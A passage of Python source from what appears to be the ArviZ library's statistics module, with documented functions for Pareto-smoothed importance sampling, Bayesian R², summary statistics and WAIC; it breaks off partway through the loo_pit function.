elpd=loo_lppd,\n se=loo_lppd_se,\n p=p_loo,\n n_samples=n_samples,\n n_data_points=n_data_points,\n warning=warn_mg,\n elpd_i=loo_lppd_i.rename(\"loo_i\"),\n pareto_k=pareto_shape,\n scale=scale,\n )\n\n\ndef psislw(log_weights, reff=1.0):\n \"\"\"\n Pareto smoothed importance sampling (PSIS).\n\n Notes\n -----\n If the ``log_weights`` input is an :class:`~xarray.DataArray` with a dimension\n named ``__sample__`` (recommended) ``psislw`` will interpret this dimension as samples,\n and all other dimensions as dimensions of the observed data, looping over them to\n calculate the psislw of each observation. If no ``__sample__`` dimension is present or\n the input is a numpy array, the last dimension will be interpreted as ``__sample__``.\n\n Parameters\n ----------\n log_weights: array\n Array of size (n_observations, n_samples)\n reff: float\n relative MCMC efficiency, ``ess / n``\n\n Returns\n -------\n lw_out: array\n Smoothed log weights\n kss: array\n Pareto tail indices\n\n References\n ----------\n * Vehtari et al. (2015) see https://arxiv.org/abs/1507.02646\n\n See Also\n --------\n loo : Compute Pareto-smoothed importance sampling leave-one-out cross-validation (PSIS-LOO-CV).\n\n Examples\n --------\n Get Pareto smoothed importance sampling (PSIS) log weights:\n\n .. 
ipython::\n\n In [1]: import arviz as az\n ...: data = az.load_arviz_data(\"non_centered_eight\")\n ...: log_likelihood = data.log_likelihood[\"obs\"].stack(\n ...: __sample__=[\"chain\", \"draw\"]\n ...: )\n ...: az.psislw(-log_likelihood, reff=0.8)\n\n \"\"\"\n if hasattr(log_weights, \"__sample__\"):\n n_samples = len(log_weights.__sample__)\n shape = [\n size for size, dim in zip(log_weights.shape, log_weights.dims) if dim != \"__sample__\"\n ]\n else:\n n_samples = log_weights.shape[-1]\n shape = log_weights.shape[:-1]\n # precalculate constants\n cutoff_ind = -int(np.ceil(min(n_samples / 5.0, 3 * (n_samples / reff) ** 0.5))) - 1\n cutoffmin = np.log(np.finfo(float).tiny) # pylint: disable=no-member, assignment-from-no-return\n\n # create output array with proper dimensions\n out = np.empty_like(log_weights), np.empty(shape)\n\n # define kwargs\n func_kwargs = {\"cutoff_ind\": cutoff_ind, \"cutoffmin\": cutoffmin, \"out\": out}\n ufunc_kwargs = {\"n_dims\": 1, \"n_output\": 2, \"ravel\": False, \"check_shape\": False}\n kwargs = {\"input_core_dims\": [[\"__sample__\"]], \"output_core_dims\": [[\"__sample__\"], []]}\n log_weights, pareto_shape = _wrap_xarray_ufunc(\n _psislw,\n log_weights,\n ufunc_kwargs=ufunc_kwargs,\n func_kwargs=func_kwargs,\n **kwargs,\n )\n if isinstance(log_weights, xr.DataArray):\n log_weights = log_weights.rename(\"log_weights\")\n if isinstance(pareto_shape, xr.DataArray):\n pareto_shape = pareto_shape.rename(\"pareto_shape\")\n return log_weights, pareto_shape\n\n\ndef _psislw(log_weights, cutoff_ind, cutoffmin):\n \"\"\"\n Pareto smoothed importance sampling (PSIS) for a 1D vector.\n\n Parameters\n ----------\n log_weights: array\n Array of length n_observations\n cutoff_ind: int\n cutoffmin: float\n k_min: float\n\n Returns\n -------\n lw_out: array\n Smoothed log weights\n kss: float\n Pareto tail index\n \"\"\"\n x = np.asarray(log_weights)\n\n # improve numerical accuracy\n x -= np.max(x)\n # sort the array\n x_sort_ind = np.argsort(x)\n # divide log weights into body and right tail\n xcutoff = max(x[x_sort_ind[cutoff_ind]], cutoffmin)\n\n expxcutoff = np.exp(xcutoff)\n (tailinds,) = np.where(x > xcutoff) # pylint: disable=unbalanced-tuple-unpacking\n x_tail = x[tailinds]\n tail_len = len(x_tail)\n if tail_len <= 4:\n # not enough tail samples for gpdfit\n k = np.inf\n else:\n # order of tail samples\n x_tail_si = np.argsort(x_tail)\n # fit generalized Pareto distribution to the right tail samples\n x_tail = np.exp(x_tail) - expxcutoff\n k, sigma = _gpdfit(x_tail[x_tail_si])\n\n if np.isfinite(k):\n # no smoothing if GPD fit failed\n # compute ordered statistic for the fit\n sti = np.arange(0.5, tail_len) / tail_len\n smoothed_tail = _gpinv(sti, k, sigma)\n smoothed_tail = np.log( # pylint: disable=assignment-from-no-return\n smoothed_tail + expxcutoff\n )\n # place the smoothed tail into the output array\n x[tailinds[x_tail_si]] = smoothed_tail\n # truncate smoothed values to the largest raw weight 0\n x[x > 0] = 0\n # renormalize weights\n x -= _logsumexp(x)\n\n return x, k\n\n\ndef _gpdfit(ary):\n \"\"\"Estimate the parameters for the Generalized Pareto Distribution (GPD).\n\n Empirical Bayes estimate for the parameters of the generalized Pareto\n distribution given the data.\n\n Parameters\n ----------\n ary: array\n sorted 1D data array\n\n Returns\n -------\n k: float\n estimated shape parameter\n sigma: float\n estimated scale parameter\n \"\"\"\n prior_bs = 3\n prior_k = 10\n n = len(ary)\n m_est = 30 + int(n**0.5)\n\n b_ary = 1 - np.sqrt(m_est 
/ (np.arange(1, m_est + 1, dtype=float) - 0.5))\n    b_ary /= prior_bs * ary[int(n / 4 + 0.5) - 1]\n    b_ary += 1 / ary[-1]\n\n    k_ary = np.log1p(-b_ary[:, None] * ary).mean(axis=1)  # pylint: disable=no-member\n    len_scale = n * (np.log(-(b_ary / k_ary)) - k_ary - 1)\n    weights = 1 / np.exp(len_scale - len_scale[:, None]).sum(axis=1)\n\n    # remove negligible weights\n    real_idxs = weights >= 10 * np.finfo(float).eps\n    if not np.all(real_idxs):\n        weights = weights[real_idxs]\n        b_ary = b_ary[real_idxs]\n    # normalise weights\n    weights /= weights.sum()\n\n    # posterior mean for b\n    b_post = np.sum(b_ary * weights)\n    # estimate for k\n    k_post = np.log1p(-b_post * ary).mean()  # pylint: disable=invalid-unary-operand-type,no-member\n    # add prior for k_post\n    sigma = -k_post / b_post\n    k_post = (n * k_post + prior_k * 0.5) / (n + prior_k)\n\n    return k_post, sigma\n\n\ndef _gpinv(probs, kappa, sigma):\n    \"\"\"Inverse Generalized Pareto distribution function.\"\"\"\n    # pylint: disable=unsupported-assignment-operation, invalid-unary-operand-type\n    x = np.full_like(probs, np.nan)\n    if sigma <= 0:\n        return x\n    is_prob = (probs > 0) & (probs < 1)\n    if np.all(is_prob):\n        if np.abs(kappa) < np.finfo(float).eps:\n            x = -np.log1p(-probs)\n        else:\n            x = np.expm1(-kappa * np.log1p(-probs)) / kappa\n        x *= sigma\n    else:\n        if np.abs(kappa) < np.finfo(float).eps:\n            x[is_prob] = -np.log1p(-probs[is_prob])\n        else:\n            x[is_prob] = np.expm1(-kappa * np.log1p(-probs[is_prob])) / kappa\n        x *= sigma\n        x[probs == 0] = 0\n        x[probs == 1] = np.inf if kappa >= 0 else -sigma / kappa\n    return x\n\n\ndef r2_samples(y_true, y_pred):\n    \"\"\"R² samples for Bayesian regression models. Only valid for linear models.\n\n    Parameters\n    ----------\n    y_true: array-like of shape = (n_outputs,)\n        Ground truth (correct) target values.\n    y_pred: array-like of shape = (n_posterior_samples, n_outputs)\n        Estimated target values.\n\n    Returns\n    -------\n    ndarray\n        Array of Bayesian R² samples.\n\n    See Also\n    --------\n    plot_lm : Posterior predictive and mean plots for regression-like data.\n\n    Examples\n    --------\n    Calculate R² samples for Bayesian regression models:\n\n    .. ipython::\n\n        In [1]: import arviz as az\n           ...: data = az.load_arviz_data('regression1d')\n           ...: y_true = data.observed_data[\"y\"].values\n           ...: y_pred = data.posterior_predictive.stack(sample=(\"chain\", \"draw\"))[\"y\"].values.T\n           ...: az.r2_samples(y_true, y_pred)\n\n    \"\"\"\n    if y_pred.ndim == 1:\n        var_y_est = np.var(y_pred)\n        var_e = np.var(y_true - y_pred)\n    else:\n        var_y_est = np.var(y_pred, axis=1)\n        var_e = np.var(y_true - y_pred, axis=1)\n    r_squared = var_y_est / (var_y_est + var_e)\n\n    return r_squared\n\n\ndef r2_score(y_true, y_pred):\n    \"\"\"R² for Bayesian regression models. Only valid for linear models.\n\n    Parameters\n    ----------\n    y_true: array-like of shape = (n_outputs,)\n        Ground truth (correct) target values.\n    y_pred: array-like of shape = (n_posterior_samples, n_outputs)\n        Estimated target values.\n\n    Returns\n    -------\n    Pandas Series with the following indices:\n    r2: Bayesian R²\n    r2_std: standard deviation of the Bayesian R².\n\n    See Also\n    --------\n    plot_lm : Posterior predictive and mean plots for regression-like data.\n\n    Examples\n    --------\n    Calculate R² for Bayesian regression models:\n\n    .. ipython::\n\n        In [1]: import arviz as az\n           ...: data = az.load_arviz_data('regression1d')\n           ...: y_true = data.observed_data[\"y\"].values\n           ...: y_pred = data.posterior_predictive.stack(sample=(\"chain\", \"draw\"))[\"y\"].values.T\n           ...: az.r2_score(y_true, y_pred)\n\n    \"\"\"\n    r_squared = r2_samples(y_true=y_true, y_pred=y_pred)\n    return pd.Series([np.mean(r_squared), np.std(r_squared)], index=[\"r2\", \"r2_std\"])\n\n\ndef summary(\n    data,\n    var_names: Optional[List[str]] = None,\n    filter_vars=None,\n    group=None,\n    fmt: \"Literal['wide', 'long', 'xarray']\" = \"wide\",\n    kind: \"Literal['all', 'stats', 'diagnostics']\" = \"all\",\n    round_to=None,\n    circ_var_names=None,\n    stat_focus=\"mean\",\n    stat_funcs=None,\n    extend=True,\n    ci_prob=None,\n    skipna=False,\n    labeller=None,\n    coords=None,\n) -> Union[pd.DataFrame, xr.Dataset]:\n    \"\"\"Create a data frame with summary statistics.\n\n    Parameters\n    ----------\n    data: obj\n        Any object that can be converted to an :class:`arviz.InferenceData` object.\n        Refer to documentation of :func:`arviz.convert_to_dataset` for details.\n    var_names: list\n        Names of variables to include in summary. Prefix the variables by ``~`` when you\n        want to exclude them from the summary: `[\"~beta\"]` instead of `[\"beta\"]` (see\n        examples below).\n    filter_vars: {None, \"like\", \"regex\"}, optional, default=None\n        If `None` (default), interpret var_names as the real variable names. If \"like\",\n        interpret var_names as substrings of the real variable names. If \"regex\",\n        interpret var_names as regular expressions on the real variable names. A la\n        ``pandas.filter``.\n    coords: Dict[str, List[Any]], optional\n        Coordinate subset for which to calculate the summary.\n    group: str\n        Select a group for summary. Defaults to \"posterior\", \"prior\" or first group\n        in that order, depending on which groups exist.\n    fmt: {'wide', 'long', 'xarray'}\n        Return format is either pandas.DataFrame {'wide', 'long'} or xarray.Dataset {'xarray'}.\n    kind: {'all', 'stats', 'diagnostics'}\n        Whether to include the `stats`: `mean`, `sd`, `hdi_3%`, `hdi_97%`, or the `diagnostics`:\n        `mcse_mean`, `mcse_sd`, `ess_bulk`, `ess_tail`, and `r_hat`. Defaults to including `all` of\n        them.\n    round_to: int\n        Number of decimals used to round results. Defaults to 2. Use \"none\" to return raw numbers.\n    circ_var_names: list\n        A list of circular variables to compute circular stats for.\n    stat_focus : str, default \"mean\"\n        Select the focus for summary.\n    stat_funcs: dict\n        A list of functions or a dict of functions with function names as keys used to calculate\n        statistics. By default, the mean, standard deviation, simulation standard error, and\n        highest posterior density intervals are included.\n\n        The functions will be given one argument, the samples for a variable as an nD array.\n        The functions should be in the style of a ufunc and return a single number. For example,\n        :func:`numpy.mean` or ``numpy.var`` would both work.\n    extend: boolean\n        If True, use the statistics returned by ``stat_funcs`` in addition to, rather than in place\n        of, the default statistics. This is only meaningful when ``stat_funcs`` is not None.\n    ci_prob: float, optional\n        Highest density interval to compute. Defaults to 0.94. This is only meaningful when\n        ``stat_funcs`` is None.\n    skipna: bool\n        If true, ignores NaN values when computing the summary statistics. It does not affect the\n        behaviour of the functions passed to ``stat_funcs``. Defaults to false.\n    labeller : labeller instance, optional\n        Class providing the method `make_label_flat` to generate the labels in the plot titles.\n        For more details on ``labeller`` usage see :ref:`label_guide`.\n\n    Returns\n    -------\n    pandas.DataFrame or xarray.Dataset\n        Return type dictated by the `fmt` argument.\n\n    The return value will contain summary statistics for each variable. Default statistics depend on\n    the value of ``stat_focus``:\n\n    ``stat_focus=\"mean\"``: `mean`, `sd`, `hdi_3%`, `hdi_97%`, `mcse_mean`, `mcse_sd`,\n    `ess_bulk`, `ess_tail`, and `r_hat`\n\n    ``stat_focus=\"median\"``: `median`, `mad`, `eti_3%`, `eti_97%`, `mcse_median`, `ess_median`,\n    `ess_tail`, and `r_hat`\n\n    `r_hat` is only computed for traces with 2 or more chains.\n\n    See Also\n    --------\n    waic : Compute the widely applicable information criterion.\n    loo : Compute Pareto-smoothed importance sampling leave-one-out\n        cross-validation (PSIS-LOO-CV).\n    ess : Calculate estimate of the effective sample size (ess).\n    rhat : Compute estimate of rank normalized split R-hat for a set of traces.\n    mcse : Calculate Markov Chain Standard Error statistic.\n\n    Examples\n    --------\n    .. ipython::\n\n        In [1]: import arviz as az\n           ...: data = az.load_arviz_data(\"centered_eight\")\n           ...: az.summary(data, var_names=[\"mu\", \"tau\"])\n\n    You can use ``filter_vars`` to select variables without having to specify all the exact\n    names. Use ``filter_vars=\"like\"`` to select based on partial naming:\n\n    .. ipython::\n\n        In [1]: az.summary(data, var_names=[\"the\"], filter_vars=\"like\")\n\n    Use ``filter_vars=\"regex\"`` to select based on regular expressions, and prefix the variables\n    you want to exclude by ``~``. Here, we exclude from the summary all the variables\n    starting with the letter t:\n\n    .. ipython::\n\n        In [1]: az.summary(data, var_names=[\"~^t\"], filter_vars=\"regex\")\n\n    Other statistics can be calculated by passing a list of functions\n    or a dictionary with key, function pairs.\n\n    .. ipython::\n\n        In [1]: import numpy as np\n           ...: def median_sd(x):\n           ...:     median = np.percentile(x, 50)\n           ...:     sd = np.sqrt(np.mean((x-median)**2))\n           ...:     return sd\n           ...:\n           ...: func_dict = {\n           ...:     \"std\": np.std,\n           ...:     \"median_std\": median_sd,\n           ...:     \"5%\": lambda x: np.percentile(x, 5),\n           ...:     \"median\": lambda x: np.percentile(x, 50),\n           ...:     \"95%\": lambda x: np.percentile(x, 95),\n           ...: }\n           ...: az.summary(\n           ...:     data,\n           ...:     var_names=[\"mu\", \"tau\"],\n           ...:     stat_funcs=func_dict,\n           ...:     extend=False\n           ...: )\n\n    Use ``stat_focus`` to change the focus of the summary statistics to the median:\n\n    .. 
ipython::\n\n In [1]: az.summary(data, stat_focus=\"median\")\n\n \"\"\"\n _log.cache = []\n\n if coords is None:\n coords = {}\n\n if labeller is None:\n labeller = BaseLabeller()\n if ci_prob is None:\n ci_prob = rcParams[\"stats.ci_prob\"]\n elif not 1 >= ci_prob > 0:\n raise ValueError(\"The value of ci_prob should be in the interval (0, 1]\")\n\n if isinstance(data, DataTree):\n if group is None:\n if not data.children:\n raise TypeError(\"DataTree does not contain any groups\")\n if \"posterior\" in data:\n dataset = convert_to_dataset(data, group=\"posterior\")\n elif \"prior\" in data:\n dataset = convert_to_dataset(data, group=\"prior\")\n else:\n first_group = list(data.children.keys())[0]\n warnings.warn(f\"Selecting first found group: {first_group}\")\n dataset = convert_to_dataset(data, group=first_group)\n elif group in data.children:\n dataset = convert_to_dataset(data, group=group)\n else:\n raise TypeError(f\"DataTree does not contain group: {group}\")\n else:\n dataset = convert_to_dataset(data, group=\"posterior\")\n var_names = _var_names(var_names, dataset, filter_vars)\n dataset = dataset if var_names is None else dataset[var_names]\n dataset = _get_coords(dataset, coords)\n\n fmt_group = (\"wide\", \"long\", \"xarray\")\n if not isinstance(fmt, str) or (fmt.lower() not in fmt_group):\n raise TypeError(f\"Invalid format: '{fmt}'. Formatting options are: {fmt_group}\")\n\n kind_group = (\"all\", \"stats\", \"diagnostics\")\n if not isinstance(kind, str) or kind not in kind_group:\n raise TypeError(f\"Invalid kind: '{kind}'. Kind options are: {kind_group}\")\n\n focus_group = (\"mean\", \"median\")\n if not isinstance(stat_focus, str) or (stat_focus not in focus_group):\n raise TypeError(f\"Invalid format: '{stat_focus}'. Focus options are: {focus_group}\")\n\n if stat_focus != \"mean\" and circ_var_names is not None:\n raise TypeError(f\"Invalid format: Circular stats not supported for '{stat_focus}'\")\n\n alpha = 1 - ci_prob\n\n extra_metrics = []\n extra_metric_names = []\n\n if stat_funcs is not None:\n if isinstance(stat_funcs, dict):\n for stat_func_name, stat_func in stat_funcs.items():\n extra_metrics.append(\n xr.apply_ufunc(\n _make_ufunc(stat_func), dataset, input_core_dims=((\"chain\", \"draw\"),)\n )\n )\n extra_metric_names.append(stat_func_name)\n else:\n for stat_func in stat_funcs:\n extra_metrics.append(\n xr.apply_ufunc(\n _make_ufunc(stat_func), dataset, input_core_dims=((\"chain\", \"draw\"),)\n )\n )\n extra_metric_names.append(stat_func.__name__)\n\n metrics: List[xr.Dataset] = []\n metric_names: List[str] = []\n if extend and kind in [\"all\", \"stats\"]:\n if stat_focus == \"mean\":\n mean = dataset.mean(dim=(\"chain\", \"draw\"), skipna=skipna)\n\n sd = dataset.std(dim=(\"chain\", \"draw\"), ddof=1, skipna=skipna)\n\n hdi_post = dataset.azstats.hdi(prob=ci_prob, multimodal=False, skipna=skipna)\n hdi_lower = hdi_post.sel(hdi=\"lower\", drop=True)\n hdi_higher = hdi_post.sel(hdi=\"higher\", drop=True)\n metrics.extend((mean, sd, hdi_lower, hdi_higher))\n metric_names.extend(\n (\"mean\", \"sd\", f\"hdi_{100 * alpha / 2:g}%\", f\"hdi_{100 * (1 - alpha / 2):g}%\")\n )\n elif stat_focus == \"median\":\n median = dataset.median(dim=(\"chain\", \"draw\"), skipna=skipna)\n\n mad = stats.median_abs_deviation(dataset, dims=(\"chain\", \"draw\"))\n eti_post = dataset.quantile(\n (alpha / 2, 1 - alpha / 2), dim=(\"chain\", \"draw\"), skipna=skipna\n )\n eti_lower = eti_post.isel(quantile=0, drop=True)\n eti_higher = eti_post.isel(quantile=1, drop=True)\n 
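# note: the median focus pairs the median with the median absolute deviation (MAD)\n            # and an equal-tailed interval (ETI) instead of the HDI used for the mean focus\n            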
metrics.extend((median, mad, eti_lower, eti_higher))\n metric_names.extend(\n (\"median\", \"mad\", f\"eti_{100 * alpha / 2:g}%\", f\"eti_{100 * (1 - alpha / 2):g}%\")\n )\n\n if circ_var_names:\n nan_policy = \"omit\" if skipna else \"propagate\"\n circ_mean = stats.circmean(\n dataset, dims=[\"chain\", \"draw\"], high=np.pi, low=-np.pi, nan_policy=nan_policy\n )\n circ_sd = stats.circstd(\n dataset, dims=[\"chain\", \"draw\"], high=np.pi, low=-np.pi, nan_policy=nan_policy\n )\n circ_mcse = xr.apply_ufunc(\n _make_ufunc(_mc_error),\n dataset,\n kwargs={\"circular\": True},\n input_core_dims=((\"chain\", \"draw\"),),\n )\n\n circ_hdi = hdi(dataset, prob=ci_prob, circular=True, skipna=skipna)\n circ_hdi_lower = circ_hdi.sel(hdi=\"lower\", drop=True)\n circ_hdi_higher = circ_hdi.sel(hdi=\"higher\", drop=True)\n\n if kind in [\"all\", \"diagnostics\"] and extend:\n diagnostics_names: Tuple[str, ...]\n if stat_focus == \"mean\":\n diagnostics = xr.apply_ufunc(\n _make_ufunc(_multichain_statistics, n_output=5, ravel=False),\n dataset,\n input_core_dims=((\"chain\", \"draw\"),),\n output_core_dims=tuple([] for _ in range(5)),\n )\n diagnostics_names = (\n \"mcse_mean\",\n \"mcse_sd\",\n \"ess_bulk\",\n \"ess_tail\",\n \"r_hat\",\n )\n\n elif stat_focus == \"median\":\n diagnostics = xr.apply_ufunc(\n _make_ufunc(_multichain_statistics, n_output=4, ravel=False),\n dataset,\n kwargs={\"focus\": \"median\"},\n input_core_dims=((\"chain\", \"draw\"),),\n output_core_dims=tuple([] for _ in range(4)),\n )\n diagnostics_names = (\n \"mcse_median\",\n \"ess_median\",\n \"ess_tail\",\n \"r_hat\",\n )\n metrics.extend(diagnostics)\n metric_names.extend(diagnostics_names)\n\n if circ_var_names and kind != \"diagnostics\" and stat_focus == \"mean\":\n for metric, circ_stat in zip(\n # Replace only the first 5 statistics for their circular equivalent\n metrics[:5],\n (circ_mean, circ_sd, circ_hdi_lower, circ_hdi_higher, circ_mcse),\n ):\n for circ_var in circ_var_names:\n metric[circ_var] = circ_stat[circ_var]\n\n metrics.extend(extra_metrics)\n metric_names.extend(extra_metric_names)\n joined = (\n xr.concat(metrics, dim=\"metric\").assign_coords(metric=metric_names).reset_coords(drop=True)\n )\n n_metrics = len(metric_names)\n n_vars = np.sum([joined[var].size // n_metrics for var in joined.data_vars])\n\n if fmt.lower() == \"wide\":\n summary_df = pd.DataFrame(\n (np.full((cast(int, n_vars), n_metrics), np.nan)), columns=metric_names\n )\n indices = []\n for i, (var_name, sel, isel, values) in enumerate(\n xarray_var_iter(joined, skip_dims={\"metric\"})\n ):\n summary_df.iloc[i] = values\n indices.append(labeller.make_label_flat(var_name, sel, isel))\n summary_df.index = indices\n elif fmt.lower() == \"long\":\n df = joined.to_dataframe().reset_index().set_index(\"metric\")\n df.index = list(df.index)\n summary_df = df\n else:\n # format is 'xarray'\n summary_df = joined\n if (round_to is not None) and (round_to not in (\"None\", \"none\")):\n summary_df = summary_df.round(round_to)\n elif round_to not in (\"None\", \"none\") and (fmt.lower() in (\"long\", \"wide\")):\n # Don't round xarray object by default (even with \"none\")\n decimals = {\n col: 3 if col not in {\"ess_bulk\", \"ess_tail\", \"r_hat\"} else 2 if col == \"r_hat\" else 0\n for col in summary_df.columns\n }\n summary_df = summary_df.round(decimals)\n\n return summary_df\n\n\ndef waic(data, pointwise=None, var_name=None, scale=None, **kwargs):\n \"\"\"Compute the widely applicable information criterion.\n\n Estimates the expected log 
pointwise predictive density (elpd) using WAIC. Also calculates the\n    WAIC's standard error and the effective number of parameters.\n    Read more theory here https://arxiv.org/abs/1507.04544 and here https://arxiv.org/abs/1004.2316\n\n    Parameters\n    ----------\n    data: obj\n        Any object that can be converted to an :class:`arviz.InferenceData` object.\n        Refer to documentation of :func:`arviz.convert_to_datatree` for details.\n    pointwise: bool\n        If True the pointwise predictive accuracy will be returned. Defaults to\n        ``stats.ic_pointwise`` rcParam.\n    var_name : str, optional\n        The name of the variable in log_likelihood groups storing the pointwise log\n        likelihood data to use for waic computation.\n    scale: str\n        Output scale for WAIC. Available options are:\n\n        - `log` : (default) log-score\n        - `negative_log` : -1 * log-score\n        - `deviance` : -2 * log-score\n\n        A higher log-score (or a lower deviance or negative log_score) indicates a model with\n        better predictive accuracy.\n    **kwargs : dict, optional\n        Keyword arguments passed to :func:`~arviz.wrap_xarray_ufunc`.\n\n    Returns\n    -------\n    ELPDData object (inherits from :class:`pandas.Series`) with the following row/attributes:\n    elpd_waic: approximated expected log pointwise predictive density (elpd)\n    se: standard error of the elpd\n    p_waic: effective number of parameters\n    var_warn: bool\n        True if posterior variance of the log predictive densities exceeds 0.4\n    waic_i: :class:`~xarray.DataArray` with the pointwise predictive accuracy,\n        only if pointwise=True\n    scale: scale of the elpd\n\n    The returned object has a custom print method that overrides pd.Series method.\n\n    See Also\n    --------\n    loo : Compute Pareto-smoothed importance sampling leave-one-out cross-validation (PSIS-LOO-CV).\n    compare : Compare models based on PSIS-LOO-CV or WAIC.\n    plot_compare : Summary plot for model comparison.\n\n    Examples\n    --------\n    Calculate WAIC of a model:\n\n    .. ipython::\n\n        In [1]: import arviz as az\n           ...: data = az.load_arviz_data(\"centered_eight\")\n           ...: az.waic(data)\n\n    Calculate WAIC of a model and return the pointwise values:\n\n    .. ipython::\n\n        In [2]: data_waic = az.waic(data, pointwise=True)\n           ...: data_waic.waic_i\n    \"\"\"\n    inference_data = convert_to_datatree(data)\n    log_likelihood = _get_log_likelihood(inference_data, var_name=var_name)\n    scale = rcParams[\"stats.ic_scale\"] if scale is None else scale.lower()\n    pointwise = rcParams[\"stats.ic_pointwise\"] if pointwise is None else pointwise\n\n    if scale == \"deviance\":\n        scale_value = -2\n    elif scale == \"log\":\n        scale_value = 1\n    elif scale == \"negative_log\":\n        scale_value = -1\n    else:\n        raise TypeError('Valid scale values are \"deviance\", \"log\", \"negative_log\"')\n\n    log_likelihood = log_likelihood.stack(__sample__=(\"chain\", \"draw\"))\n    shape = log_likelihood.shape\n    n_samples = shape[-1]\n    n_data_points = np.prod(shape[:-1])\n\n    ufunc_kwargs = {\"n_dims\": 1, \"ravel\": False}\n    kwargs.setdefault(\"input_core_dims\", [[\"__sample__\"]])\n    lppd_i = _wrap_xarray_ufunc(\n        _logsumexp,\n        log_likelihood,\n        func_kwargs={\"b_inv\": n_samples},\n        ufunc_kwargs=ufunc_kwargs,\n        **kwargs,\n    )\n\n    vars_lpd = log_likelihood.var(dim=\"__sample__\")\n    warn_mg = False\n    if np.any(vars_lpd > 0.4):\n        warnings.warn(\n            (\n                \"For one or more samples the posterior variance of the log predictive \"\n                \"densities exceeds 0.4. This could be an indication of WAIC starting to fail. 
\\n\"\n \"See http://arxiv.org/abs/1507.04544 for details\"\n )\n )\n warn_mg = True\n\n waic_i = scale_value * (lppd_i - vars_lpd)\n waic_se = (n_data_points * np.var(waic_i.values)) ** 0.5\n waic_sum = np.sum(waic_i.values)\n p_waic = np.sum(vars_lpd.values)\n\n if not pointwise:\n return ELPDData(\n kind=\"waic\",\n elpd=waic_sum,\n se=waic_se,\n p=p_waic,\n n_samples=n_samples,\n n_data_points=n_data_points,\n warning=warn_mg,\n scale=scale,\n )\n if np.equal(waic_sum, waic_i).all(): # pylint: disable=no-member\n warnings.warn(\n \"\"\"The point-wise WAIC is the same with the sum WAIC, please double check\n the Observed RV in your model to make sure it returns element-wise logp.\n \"\"\"\n )\n return ELPDData(\n kind=\"waic\",\n elpd=waic_sum,\n se=waic_se,\n p=p_waic,\n n_samples=n_samples,\n n_data_points=n_data_points,\n warning=warn_mg,\n scale=scale,\n elpd_i=waic_i.rename(\"waic_i\"),\n )\n\n\ndef loo_pit(idata=None, *, y=None, y_hat=None, log_weights=None):\n \"\"\"Compute leave one out (PSIS-LOO) probability integral transform (PIT) values.\n\n Parameters\n ----------\n idata: InferenceData\n :class:`arviz.InferenceData` object.\n y: array, DataArray or str\n Observed data. If str, ``idata`` must be present and contain the observed data group\n y_hat: array, DataArray or str\n Posterior predictive samples for ``y``. It must have the same shape as y plus an\n extra dimension at the end of size n_samples (chains and draws stacked). If str or\n None, ``idata`` must contain the posterior predictive group. If None, y_hat is taken\n equal to y, thus, y must be str too.\n log_weights: array or DataArray\n Smoothed log_weights. It must have the same shape as ``y_hat``\n\n Returns\n -------\n loo_pit: array or DataArray\n Value of the LOO-PIT at each observed data point.\n\n See Also\n --------\n plot_loo_pit : Plot Leave-One-Out probability integral transformation (PIT) predictive checks.\n loo : Compute Pareto-smoothed importance sampling leave-one-out\n cross-validation (PSIS-LOO-CV).\n plot_elpd : Plot pointwise elpd differences between two or more models.\n plot_khat : Plot Pareto tail indices for diagnosing convergence.\n\n Examples\n --------\n Calculate LOO-PIT values using as test quantity the observed values themselves.\n\n .. ipython::\n\n In [1]: import arviz as az\n ...: data = az.load_arviz_data(\"centered_eight\")\n ...: az.loo_pit(idata=data, y=\"obs\")\n\n Calculate LOO-PIT values using as test quantity the square of the difference between\n each observation and `mu`. Both ``y`` and ``y_hat`` inputs will be array-like,\n but ``idata`` will still be passed in order to calculate the ``log_weights`` from\n there.\n\n .. 
ipython::\n\n        In [1]: T = data.observed_data.obs - data.posterior.mu.median(dim=(\"chain\", \"draw\"))\n           ...: T_hat = data.posterior_predictive.obs - data.posterior.mu\n           ...: T_hat = T_hat.stack(__sample__=(\"chain\", \"draw\"))\n           ...: az.loo_pit(idata=data, y=T**2, y_hat=T_hat**2)\n\n    \"\"\"\n    y_str = \"\"\n    if idata is not None and not isinstance(idata, DataTree):\n        raise ValueError(\"idata must be of type DataTree or None\")\n\n    if idata is None:\n        if not all(isinstance(arg, (np.ndarray, xr.DataArray)) for arg in (y, y_hat, log_weights)):\n            raise ValueError(\n                \"all three of y, y_hat and log_weights must be array or DataArray when idata is None \"\n                f\"but they are of types {[type(arg) for arg in (y, y_hat, log_weights)]}\"\n            )\n\n    else:\n        if y_hat is None and isinstance(y, str):\n            y_hat = y\n        elif y_hat is None:\n            raise ValueError(\"y_hat cannot be None if y is not a str\")\n        if isinstance(y, str):\n            y_str = y\n            y = idata.observed_data[y].values\n        elif not isinstance(y, (np.ndarray, xr.DataArray)):\n            raise ValueError(f\"y must be of types array, DataArray or str, not {type(y)}\")\n        if isinstance(y_hat, str):\n            y_hat = idata.posterior_predictive[y_hat].stack(__sample__=(\"chain\", \"draw\")).values\n        elif not isinstance(y_hat, (np.ndarray, xr.DataArray)):\n            raise ValueError(f\"y_hat must be of types array, DataArray or str, not {type(y_hat)}\")\n        if log_weights is None:\n            if y_str:\n                try:\n                    log_likelihood = _get_log_likelihood(idata, var_name=y_str)\n                except TypeError:\n                    log_likelihood = _get_log_likelihood(idata)\n            else:\n                log_likelihood = _get_log_likelihood(idata)\n            log_likelihood = log_likelihood.stack(__sample__=(\"chain\", \"draw\"))\n            posterior = convert_to_dataset(idata, group=\"posterior\")\n            n_chains = len(posterior.chain)\n            n_samples = len(log_likelihood.__sample__)\n            ess_p = ess(posterior, method=\"mean\")\n            # this mean is over all data variables\n            reff = (\n                (np.hstack([ess_p[v].values.flatten() for v in ess_p.data_vars]).mean() / n_samples)\n                if n_chains > 1\n                else 1\n            )\n            log_weights = psislw(-log_likelihood, reff=reff)[0].values\n        elif not isinstance(log_weights, (np.ndarray, xr.DataArray)):\n            raise ValueError(\n                f\"log_weights must be None or of types array or DataArray, not {type(log_weights)}\"\n            )\n\n    if len(y.shape) + 1 != len(y_hat.shape):\n        raise ValueError(\n            f\"y_hat must have 1 more dimension than y, but y_hat has {len(y_hat.shape)} dims and \"\n            f\"y has {len(y.shape)} dims\"\n        )\n\n    if y.shape != y_hat.shape[:-1]:\n        raise ValueError(\n            f\"y has shape: {y.shape} which should be equal to y_hat shape (omitting the last \"\n            f\"dimension): {y_hat.shape}\"\n        )\n\n    if y_hat.shape != log_weights.shape:\n        raise ValueError(\n            \"y_hat and log_weights must have the same shape but have shapes \"\n            f\"{y_hat.shape} and {log_weights.shape}\"\n        )\n\n    kwargs = {\n        \"input_core_dims\": [[], [\"__sample__\"], 